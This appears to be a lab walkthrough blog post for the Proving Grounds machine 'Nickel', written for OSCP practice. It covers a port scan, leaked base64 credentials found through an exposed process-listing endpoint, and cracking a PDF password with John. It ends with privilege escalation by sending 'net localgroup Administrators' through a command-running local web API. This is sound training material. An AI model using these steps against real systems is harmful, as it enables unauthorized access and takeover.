Proving grounds:Nickel
5 min readJan 8, 2023
Today we will take a look at Proving grounds: Nickel. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.
- Network scan
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 8684fdd5432705cfa7f2e9e27570d5f3 (RSA)
| 256 9c93cf48a94e70f460dee1a9c2c0b6ff (ECDSA)
|_ 256 004ed73b0f9fe3744d04990bb18bdea5 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2022-11-13T02:21:18
|_Not valid after: 2023-05-15T02:21:18
|_ssl-date: 2023-01-08T15:57:36+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2023-01-08T15:56:29+00:00
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
33333/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows- 33333 (dgi-serv)
Nothing yet.
- 8089
Port 8089 seems to be some kind of development environment.
Touching a button for interest
He directed us to a completely different address. But that port was open on our ip. Let’s check it out for ourselves with Curl.
- ariah
I replaced request with “POST”.
└─$ curl -X POST http://192.168.68.99:33333/list-running-procs
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>Requires Content Length
─$ curl -d "" -X POST http://192.168.68.99:33333/list-running-procs
name : System Idle Process
commandline :
name : System
commandline :
name : Registry
commandline :
name : smss.exe
commandline :
name : csrss.exe
commandline :
name : wininit.exe
commandline :
name : csrss.exe
commandline :
name : winlogon.exe
commandline : winlogon.exe
name : services.exe
commandline :
name : lsass.exe
commandline : C:\Windows\system32\lsass.exe
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : fontdrvhost.exe
commandline : "fontdrvhost.exe"
name : LogonUI.exe
commandline : "LogonUI.exe" /flags:0x2 /state0:0xa3bd3855 /state1:0x41c64e6d
name : dwm.exe
commandline : "dwm.exe"
name : powershell.exe
commandline : powershell.exe -nop -ep bypass C:\windows\system32\ws80.ps1
name : Memory Compression
commandline :
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
--user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol sshWe found credentials for Ariah
Let’s decode the password with base64.
└─$ echo "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" |base64 -d
NowiseSloopTheory139Log in with ssh.
- ssh
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
nickel\ariah S-1-5-21-2696774334-3254175373-101825863-1003
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledWe have low-level privileges.
- ftp
└─$ ftp 192.168.68.99
Connected to 192.168.68.99.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (192.168.68.99:kali): ariah
331 Password required for ariah
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 Port command successful
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp 46235 Sep 01 2020 Infrastructure.pdf
226 Successfully transferred "/"
ftp> mget Infrastructure.pdf
mget Infrastructure.pdf [anpqy?]? y
200 Port command successful
150 Opening data channel for file download from server of "/Infrastructure.pdf"
100% |************************************************************************************************************************************************| 46235 242.10 KiB/s 00:00 ETA
226 Successfully transferred "/Infrastructure.pdf"
46235 bytes received in 00:00 (241.59 KiB/s)
ftp> exit
221 GoodbyeThe ftp contains an encrypted .pdf file.
Crack the password with John and see the contents.
─$ pdf2john Infrastructure.pdf > hash
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ariah4168 (Infrastructure.pdf)
1g 0:00:01:02 DONE (2023-01-08 20:05) 0.01605g/s 160633p/s 160633c/s 160633C/s arial<3..ariadne01
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.Browse these sites locally with curl
I don’t know what to do, so I’m asking for help.
Powershell appeared before us. Check.
ariah@NICKEL C:\Users\ariah>curl http://nickel?whoami
<!doctype html><html><body>dev-api started at 2022-11-13T18:21:29
<pre>nt authority\system
</pre>
</body></html>We have a great system authority. Let’s give administrator authority to the user we are.
Don’t forget to url encode.
ariah@NICKEL C:\Users\ariah>curl http://nickel?net%20localgroup%20Administrators%20ariah%20%2Fadd
<!doctype html><html><body>dev-api started at 2022-11-13T18:21:29
<pre>The command completed successfully.
</pre>
</body></html>
ariah@NICKEL C:\Users\ariah>whoami /allPOC
And now we are the Administrator
“If you have any questions or comments, please do not hesitate to write. Have a good days”
